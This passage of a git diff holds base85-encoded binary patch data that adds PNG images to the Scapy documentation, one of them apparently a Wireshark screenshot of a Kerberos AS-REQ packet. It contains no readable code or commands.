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 literal 0 HcmV?d00001 diff --git a/doc/scapy/graphics/kerberos/wireshark_asreq.png b/doc/scapy/graphics/kerberos/wireshark_asreq.png new file mode 100644 index 0000000000000000000000000000000000000000..68e82760741c1603c042ee9f5d1f0bcb85e574c5 GIT binary patch literal 27215 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 